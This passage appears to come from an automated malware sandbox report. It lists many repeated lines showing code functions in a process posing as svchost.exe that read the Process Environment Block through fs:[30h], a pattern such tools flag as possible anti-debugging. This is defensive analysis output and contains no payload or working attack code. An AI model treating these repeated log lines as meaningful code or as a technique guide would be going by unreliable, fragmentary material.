            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160124 mov eax, dword ptr fs:[00000030h]1_2_03160124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h]1_2_0312C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h]1_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]1_2_03204164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]1_2_03204164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03170185 mov eax, dword ptr fs:[00000030h]1_2_03170185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]1_2_031D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]1_2_031D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]1_2_032061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]1_2_031601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]1_2_031B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6030 mov eax, dword ptr fs:[00000030h]1_2_031C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]1_2_0312A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]1_2_0312C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]1_2_03132050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]1_2_031B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]1_2_0315C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]1_2_0313208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031280A0 mov eax, dword ptr fs:[00000030h]1_2_031280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]1_2_031C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]1_2_031B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]1_2_0312C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]1_2_031720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0312A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]1_2_031380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]1_2_031B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]1_2_03130710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]1_2_03160710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]1_2_0316C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]1_2_031AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]1_2_03130750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]1_2_031BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]1_2_031B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]1_2_03138770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D678E mov eax, dword ptr fs:[00000030h]1_2_031D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]1_2_031307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E47A0 mov eax, dword ptr fs:[00000030h]1_2_031E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]1_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]1_2_031B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]1_2_031BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]1_2_03172619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]1_2_031AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]1_2_0314E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]1_2_03166620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]1_2_03168620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]1_2_0313262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]1_2_0314C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]1_2_03162674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]1_2_031666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]1_2_0316C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0316A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h]1_2_0316A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]1_2_031B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]1_2_031B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6500 mov eax, dword ptr fs:[00000030h]1_2_031C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]1_2_03138550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]1_2_03138550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]1_2_0316656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]1_2_0316656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]1_2_0316656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E59C mov eax, dword ptr fs:[00000030h]1_2_0316E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132582 mov eax, dword ptr fs:[00000030h]1_2_03132582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132582 mov ecx, dword ptr fs:[00000030h]1_2_03132582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03164588 mov eax, dword ptr fs:[00000030h]1_2_03164588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]1_2_031545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]1_2_031545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]1_2_031B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]1_2_031B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]1_2_031B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031365D0 mov eax, dword ptr fs:[00000030h]1_2_031365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]1_2_0316A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]1_2_0316A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]1_2_0316E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]1_2_0316E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031325E0 mov eax, dword ptr fs:[00000030h]1_2_031325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]1_2_0316C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]1_2_0316C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C427 mov eax, dword ptr fs:[00000030h]1_2_0312C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA456 mov eax, dword ptr fs:[00000030h]1_2_031EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312645D mov eax, dword ptr fs:[00000030h]1_2_0312645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315245A mov eax, dword ptr fs:[00000030h]1_2_0315245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC460 mov ecx, dword ptr fs:[00000030h]1_2_031BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA49A mov eax, dword ptr fs:[00000030h]1_2_031EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031644B0 mov ecx, dword ptr fs:[00000030h]1_2_031644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BA4B0 mov eax, dword ptr fs:[00000030h]1_2_031BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031364AB mov eax, dword ptr fs:[00000030h]1_2_031364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031304E5 mov ecx, dword ptr fs:[00000030h]1_2_031304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
